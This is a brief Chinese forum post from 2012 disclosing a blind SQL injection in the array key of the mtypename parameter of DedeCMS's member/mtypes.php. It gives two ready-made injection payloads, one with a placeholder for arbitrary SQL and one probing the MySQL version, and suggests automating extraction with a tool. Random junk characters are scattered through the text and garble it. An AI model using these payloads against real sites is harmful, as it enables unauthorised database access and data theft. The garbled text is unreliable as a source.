需要magic_quotes_gpc = Off,所以说是鸡肋啊.+ _& n0 [# \! v$ v2 F' C( @
4 @! t6 T7 ?* P5 Q+ X' x6 P
6 \4 Q% |* O7 W, I- t发生在数组key里的注射漏洞,有点意思.
% M# X, C% x8 I$ q% C) j8 i+ g : _, e4 \; B4 o7 [2 N
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下* D$ u& w( w1 r: h5 [3 E/ M
; k6 Z" c6 a- D* ^( z6 J5 g9 q
http://www.xxx.com /dede/member/mtypes.php?dopost=save
7 a5 l% q3 O" s/ W* [
) q. z) a+ O k6 {exploit:, e, ?+ e" x3 r+ ^* v" Q1 B2 @( X
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
( f* e% L% u* b8 |3 \mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
+ q" J5 l1 \2 B2 O# T: e |
发表于 2012-12-20 08:08:09
收藏
支持
反对